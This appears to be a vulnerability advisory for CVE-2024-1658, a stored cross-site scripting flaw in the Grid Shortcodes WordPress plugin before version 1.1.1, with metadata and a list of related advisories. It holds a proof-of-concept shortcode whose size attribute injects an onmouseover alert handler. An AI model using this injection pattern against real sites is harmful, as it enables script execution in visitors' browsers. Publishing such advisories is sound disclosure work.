Grid Shortcodes < 1.1.1 – Contributor+ Stored XSS | CVE 2024-1658 | Plugin Vulnerabilities

Description

The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks

Proof of Concept

[GDC_row]
[GDC_column size='" onmouseover="alert(1123123)"']
Your content here
[/GDC_column]
[GDC_column size="third"]
Your content here
[/GDC_column]
[GDC_column size="third"]
Your content here
[/GDC_column]
[/GDC_row]

Affects Plugins

grid-shortcodes

Fixed in 1.1.1

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

9489925e-5a47-4608-90a2-0139c5e1c43c

Timeline

Publicly Published

2024-02-26 (about 2 months ago)

Added

2024-02-26 (about 2 months ago)

Last Updated

2024-02-26 (about 2 months ago)

Other

Published

Title

Published

2014-08-01

Title

xili-language - index.php lang Parameter XSS

Published

2021-11-23

Title

HTML5 Responsive FAQ <= 2.8.5 - Admin+ Stored Cross-Site Scripting

Published

2023-05-30

Title

Google Fonts For WordPress < 3.0.1 - Reflected XSS

Published

2019-02-05

Title

YOP Poll <= 6.0.2 - Cross-Site Scripting (XSS)

Published

2015-06-30

Title

NewStatPress <= 1.0.3 - Unauthenticated Stored Cross-Site Scripting (XSS)